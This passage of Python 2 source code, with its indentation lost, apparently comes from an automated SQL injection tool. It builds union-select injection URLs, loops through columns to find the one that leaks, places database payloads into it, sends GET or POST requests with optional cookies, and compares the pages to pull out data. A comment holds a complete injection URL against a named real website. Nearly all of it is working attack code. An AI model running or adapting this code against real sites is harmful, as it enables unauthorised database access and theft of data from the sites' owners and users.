temp_vul_page = vul_page[:vul_page.find('$@%#')]
if vul_page[vul_page.find('$@%#')-1] == "'":
vul_page = temp_vul_page[:temp_vul_page.rfind('=')+1:] + "-" + string_check + "'" + vul_page[vul_page.find('$@%#'):]
else:
vul_page = temp_vul_page[:temp_vul_page.rfind('=')+1:] + "-" + string_check + vul_page[vul_page.find('$@%#'):]
else:
vul_page = vul_page[:vul_page.rfind('=')+1] + "-" + vul_page[vul_page.rfind('=')+1:] # Adding - after =
else:
vul_page = vul_page[:vul_page.rfind('=')+1] + "-" + vul_page[vul_page.rfind('=')+1:] # Adding - after =
for clmn_num in range(2, column_num+1): # Create a string with column's number
clmn_list = clmn_list+","+clmn_num.__str__()
# Wrapping for loop with a while loop so we can start over again the for loop for all payloads
proggress = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"] [ - ] searching..."
print "searching..."
while should_restart:
# sys.stdout.write(proggress+".") # Graphic progress.
should_continue = False
should_restart = False
dbinfo1_found = False
dbinfo2_found = False
dbinfo3_found = False
dbinfo4_found = False
dbinfo5_found = False
dbinfo_exit = False
loop_counter = 0
for clmn_num in range(1, column_num+1): # Looping throw column nums trying to find the vulnerable one
loop_counter += 1 # Increasing until it gets equals to column num
if form_mode:
compare_url = vul_page.replace("$@%#", par + sp + "union" + sp + "all" + sp + "select" + sp+clmn_list+"--" + plus) # First page for comparison
# print "compare url form_mode;", compare_url # Debugging
else:
compare_url = vul_page + par + sp + "union" + sp + "all" + sp + "select" + sp + clmn_list+"--" + plus # First page for comparison
# print "compare url without form_mode:", compare_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = compare_url[compare_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
compare_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
compare_html = urllib.urlopen(compare_url).read()
else:
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = compare_url[compare_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
compare_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
compare_html = requests.get(compare_url, cookies=cookies_dict).text
except:
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
# The comma between the columns is also a benchmark so during the iteration the program can
# separate the number e.g, 1 from 12 or 11 or 21, which also contains the number 1, and
# replaces only the number 1 instead of changing number 11 or 12 or 21
temp_clmn1 = "" # Initiates the variable
temp_clmn1 = ","+clmn_list+"," # Adds a comma in front of the column list
temp_clmn2 = temp_clmn1.replace(","+clmn_num.__str__()+",", ","+db_payload1+",") # New list with payload
temp_clmn2 = temp_clmn2[1:-1] # Removes the comma in front of the list
if form_mode:
union_url = vul_page.replace("$@%#", par+sp+"union"+sp+"all"+sp+"select"+sp+temp_clmn2+db_payload2+"--" + plus) # Second, injected URL (with payload)
print "union url form_mode:", union_url # Debugging
else:
union_url = vul_page + par+sp+"union"+sp+"all"+sp+"select"+sp+temp_clmn2+db_payload2+"--" + plus # Second, injected URL (with payload)
print "union url without Form mode:", union_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = union_url[union_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
union_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
union_html = urllib.urlopen(union_url).read()
else:
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = union_url[union_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
union_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
union_html = requests.get(union_url, cookies=cookies_dict).text
except:
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
if "<body" in compare_html: compare_html_body_list = compare_html.split("<body")
if "<body" in union_html: union_html_body_list = union_html.split("<body")
try: compare_html_body = compare_html_body_list[1]
except: compare_html_body = compare_html
try: union_html_body = union_html_body_list[1]
except: union_html_body = union_html
comp_rem_tags = re.sub('<[/A-Za-z0-9]*>', ' !@#$ ', compare_html_body) # Replacing HTML tags with spaces
union_rem_tags = re.sub('<[/A-Za-z0-9]*>', ' !@#$ ', union_html_body)
compare_split = comp_rem_tags.split(' !@#$ ') # splitting on spaces.
union_split = union_rem_tags.split(' !@#$ ')
compare_set = set(compare_split) # Creating a set with unique attributes
union_set = set(union_split)
compare_removed = union_set - compare_set # Comparing the two set (pages) for differences
union_removed = compare_set - union_set # Needed if the bellow are in use
"""
# Needed when e.g, the results are like "Welcome back John" and not just "John"
# Not needed // TODO: Try putting the next two lines in lines
# union_split_str = ' '.join(union_split)
# union_split_str = re.sub('\s+', ' ', union_split_str)
# union_split_spaces = union_split_str.split(' ')
# Needed when, see example: http://www.cochraneventilation.com/
# articledetails.php?id=-9+union+all+select+1,concat%28id,0x40232340,
# table_id,0x40232340,c1,0x40232340,c2,0x40232340,
# colspan%29,3,4,5,6,7,8+from+cms_rows+limit+0,1--
toremove = ""
for cr in compare_removed:
cr2 = cr.__str__()
if " " in cr2:
toremove = cr
try:
compare_removed.remove(toremove)
except:
pass
"""
compare_string = "" # Creating vars to store set as string
union_string = ""
comm_word = ""
for se in compare_removed: compare_string = se # Creating string with set
for se in union_removed: union_string = se
compare_split_2 = compare_string.split(' ') # splitting on spaces.
union_split_2 = union_string.split(' ')
compare_set_2 = set(compare_split_2) # Creating a set with unique attributes
union_set_2 = set(union_split_2)
common_words = union_set_2 & compare_set_2 # Creating one set with common attributes
for se in common_words: comm_word += " " + se # Making the set string
comm_word = comm_word.strip()
skata = re.sub(comm_word, "", compare_string.strip()).strip() # Removing the unnecessary words
# compare_removed.update([skata]) # Adding the new word to the set || Not needed
# Debugging
# print "union_split", union_split
# print "compare_removed", compare_removed
# print "comm_word", comm_word
# print "skata", skata
for word in union_split: # Spotting the differences
# word = word.strip()
if skata == "": skata = "empty!!!"
# if "<" in skata or ">" in skata: skata = "empty!!!"
# if "<" in word or ">" in word: word = "empty2!!!"
# print bcolors.OKGREEN + "Debug:", skata # Debugging 1
# print bcolors.OKBLUE + "Debug:", word.strip() # Debugging 2
tbl_out1 = 0
clmn_out1 = 0
clinfo_out1 = 0
# Warning: If the first payload does not run, then the other ones will never run!!!!!!!!!!
if skata in word or fake_diff:
# print "YEEEEEEEEEEEEEEEAAAAAAAAAAAAAA!!!!!!!!!!!!!!!" # Debugging (if skata and word is the same, then YEA! is printed)
word = skata
if not fake_diff: # If a difference has been found
if "<" in word or ">" in word: # Checking if the difference is useful or not
should_continue = True # If the difference is not useful, keep searching
if should_continue: # If the difference is not useful, keep searching
continue
print bcolors.HEADER + "Debug:", word.strip() # Debugging 3